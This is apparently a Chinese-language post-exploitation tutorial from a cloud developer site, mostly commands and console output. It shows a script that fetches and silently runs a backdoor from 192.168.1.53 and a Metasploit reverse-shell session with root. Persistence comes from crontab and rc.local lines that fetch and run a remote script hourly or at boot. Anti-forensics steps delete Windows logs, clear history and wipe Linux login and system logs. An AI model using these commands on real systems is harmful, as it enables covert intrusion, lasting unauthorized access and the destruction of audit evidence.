#!/bin/bash
#切换工作目录
cd /tmp/
#把前面下载 Vegile 到执行后门文件的命令使用&&拼接成一条命令;&&表示前面的命令执行成功则执行下一条命令
# echo y | 表示将 y 作为 Vegile 命令的输入,因为执行 Vegile 命令是需要我们按任意键退出,所
以我们手动输入一个字符让程序执行完成后自动退出。
#>> /dev/null 2>&1 不显示所有输出结果。
wget 192.168.1.53/Vegile-master.zip && unzip Vegile-master.zip && cd Vegile-master && chmod
+x Vegile && wget 192.168.1.53/xuegod-ghost && chmod +x xuegod-ghost && echo y | ./Vegile --i xuegod-ghost >> /dev/null 2>&1
#2>&1 的意思就是将标准错误重定向到标准输出。这里标准输出已经重定向到了 /dev/null。那么标准错误也会输出到/dev/null。/dev/null 可以看作"黑洞". 它等价于一个只写文件. 所有写入它的内容都会永远丢失. 而尝试从它那儿读取内容则什么也读不到
#删除下载的所有文件
rm -rf /tmp/Vegile-master.zip /tmp/Vegile-master
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# msfconsole
Metasploit tip: Use the analyze command to suggest runnable modules for
hosts
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v6.3.55-dev ]
+ -- --=[ 2397 exploits - 1232 auxiliary - 422 post ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
msf6 >
msf6 > use /exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > jobs -K
Stopping all jobs...
msf6 exploit(multi/handler) > sessions -K
[*] Killing all sessions...
msf6 exploit(multi/handler) > exploit -j
msf6 exploit(multi/handler) > sessions -i 21
[*] Starting interaction with 21...
pwd
pwd: error retrieving current directory: getcwd: cannot access parent directories: No
such file or directory
cd /root/
pwd
/root
id
uid=0(root) gid=0(root) groups=0(root)
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# echo "bash <(curl -s -L http://192.168.1.53/xuegod.sh) >>/dev/null 2>&1" >> /etc/rc0.d/rc.local
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# chmod +x /etc/rc0.d/rc.local
msf6 exploit(multi/handler) > sessions -K #删除原来的会话
[*] Killing all sessions...
msf6 exploit(multi/handler) > exploit -j #重新侦听
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# ll /etc/crontab
-rw-r--r-- 1 root root 1042 2024年 1月21日 /etc/crontab
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# vim /etc/crontab
PATH=/sbin:/bin:/usr/sbin:/usr/bin #系统执行命令的搜索路径
MAILTO=root #将执行任务的信息通过邮件发送给 xx 用户
0 */1 * * * root bash <(curl -s -L http://192.168.1.53/xuegod.sh) >> /dev/null 2>&1
#保存退出,每小时执行一次。
回到控制台查看
meterpreter > shell
C:\Windows\system32>del %WINDIR%\*.log /a/s/q/f
del:删除文件。
%WINDIR%*.log:
%WINDIR%:Windows 操作系统安装目录,通常为 C:\Windows。
*.log:匹配所有 .log 后缀的日志文件。
/a:按属性删除文件。可以删除具有指定属性的文件(例如只读、隐藏、系统文件等)。
/s:递归删除当前目录及所有子目录中的 .log 文件。
/q:安静模式,不显示删除确认提示,直接删除。
/f:强制删除只读文件。
history -c
vi /etc/profile,找到 HISTSIZE 这个值,修改为 0
1. 访问失败的日志
删除登录失败记录:
echo > /var/log/btmp
2. 访问成功的日志
删除登录成功记录:
echo > /var/log/wtmp
#此时再次执行 last 命令就会发现没有记录
3. 删除日志记录:
echo > /var/log/secure
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# cat clog.sh
#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
history -c
扫码关注腾讯云开发者
领取腾讯云代金券
Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287
Copyright © 2013 - 2025 Tencent Cloud.
All Rights Reserved. 腾讯云 版权所有